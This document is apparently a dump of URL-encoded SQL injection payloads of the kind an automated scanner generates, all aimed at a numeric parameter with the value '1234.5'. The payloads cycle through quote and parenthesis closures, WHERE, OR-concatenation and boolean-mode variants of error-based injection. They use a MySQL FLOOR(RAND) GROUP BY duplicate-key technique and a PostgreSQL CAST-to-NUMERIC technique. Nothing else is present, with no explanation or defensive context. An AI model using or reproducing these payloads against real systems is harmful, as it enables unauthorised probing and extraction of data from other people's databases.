1234.5%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27OhLx%27%3D%27OhLx 1234.5%27%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27XYYD%27%3D%27XYYD 1234.5%27%29%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27gsKc%27%3D%27gsKc 1234.5%27%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27BdtU%27%3D%27BdtU 1234.5%27%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27kgex%27%20LIKE%20%27kgex 1234.5%27%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27ZKPP%27%20LIKE%20%27ZKPP 1234.5%27%29%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27TSBp%27%20LIKE%20%27TSBp 1234.5%27%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27OkDv%27%20LIKE%20%27OkDv 1234.5%22%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22RTBn%22%3D%22RTBn 1234.5%22%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22WrZV%22%3D%22WrZV 1234.5%22%29%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22EicP%22%3D%22EicP 1234.5%22%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22ncph%22%3D%22ncph 1234.5%22%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22briS%22%20LIKE%20%22briS 1234.5%22%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22ocLI%22%20LIKE%20%22ocLI 1234.5%22%29%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22rsUE%22%20LIKE%20%22rsUE 1234.5%22%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22eotg%22%20LIKE%20%22eotg 1234.5%29%20WHERE%204293%3D4293%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%29%20WHERE%208024%3D8024%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%20WHERE%203134%3D3134%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%22%20WHERE%206862%3D6862%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%20%7C%7C%20%28SELECT%204717%20FROM%20DUAL%20WHERE%203833%3D3833%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206441%20WHERE%203245%3D3245%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205115%20FROM%20DUAL%20WHERE%207698%3D7698%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 1234.5%20%2B%20%28SELECT%203329%20WHERE%208591%3D8591%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27iIpi%27%20FROM%20DUAL%20WHERE%202750%3D2750%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mFGy%27%20WHERE%206659%3D6659%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%23 1234.5%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%22%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%282905%3D2905 1234.5%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%288504%3D8504 1234.5%29%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%288857%3D8857 1234.5%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27OvfO%27%3D%27OvfO 1234.5%27%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27SBIX%27%3D%27SBIX 1234.5%27%29%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27WfXB%27%3D%27WfXB 1234.5%27%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27IBlL%27%3D%27IBlL 1234.5%27%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27zXlw%27%20LIKE%20%27zXlw 1234.5%27%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27VezB%27%20LIKE%20%27VezB 1234.5%27%29%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27BcNO%27%20LIKE%20%27BcNO 1234.5%27%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27MRHf%27%20LIKE%20%27MRHf 1234.5%22%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22pPcq%22%3D%22pPcq 1234.5%22%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22euPw%22%3D%22euPw 1234.5%22%29%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22gAfa%22%3D%22gAfa 1234.5%22%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22qUqe%22%3D%22qUqe 1234.5%22%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22nLVa%22%20LIKE%20%22nLVa 1234.5%22%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22JLFE%22%20LIKE%20%22JLFE 1234.5%22%29%29%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22pFFm%22%20LIKE%20%22pFFm 1234.5%22%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22vPil%22%20LIKE%20%22vPil 1234.5%29%20WHERE%204071%3D4071%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%29%20WHERE%203053%3D3053%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%20WHERE%201720%3D1720%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%22%20WHERE%202246%3D2246%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1234.5%27%20%7C%7C%20%28SELECT%208998%20FROM%20DUAL%20WHERE%209672%3D9672%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202130%20WHERE%204948%3D4948%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208706%20FROM%20DUAL%20WHERE%208864%3D8864%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 